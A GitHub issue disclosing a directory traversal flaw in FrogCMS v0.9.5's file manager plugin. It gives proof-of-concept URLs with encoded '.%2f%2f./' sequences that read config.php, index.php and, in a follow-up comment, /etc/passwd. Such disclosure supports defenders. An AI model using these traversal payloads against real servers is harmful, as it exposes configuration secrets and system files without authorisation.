Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

FrogCMSv0.9.5 Directory Traversal Vulnerability #34

Open
Ke7b3r0s opened this issue Sep 14, 2020 · 3 comments
Open

FrogCMSv0.9.5 Directory Traversal Vulnerability #34

Ke7b3r0s opened this issue Sep 14, 2020 · 3 comments

Comments

@Ke7b3r0s
Copy link

There is a directory traversal vulnerability when logined as a admin and view the uploaded files.An attacker can read arbitrarily file on a remote server via GET request urlencode parameter.

1.Read config.php.

http://127.0.0.1:8888/FrogCMS/admin/?/plugin/file_manager/view/.%2f%2f./config.php

image

2.Read index.php.

http://127.0.0.1:8888/FrogCMS/admin/?/plugin/file_manager/view/.%2f%2f./index.php

image

@attritionorg
Copy link

If logged in as the admin, they would have legitimate access to e.g. /FrogCMS/admin/?/plugin/file_manager/index.php from your second example, right? Can this be used to read files outside of the webroot?

@Ke7b3r0s
Copy link
Author

Of course,just like this
http://127.0.0.1:8888/Frog/admin/?/plugin/file_manager/view/.%2f%2f./.%2f%2f./.%2f%2f./.%2f%2f./.%2f%2f./etc/passwd
image

@attritionorg
Copy link

@Ke7b3r0s Excellent, thank you for confirming!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants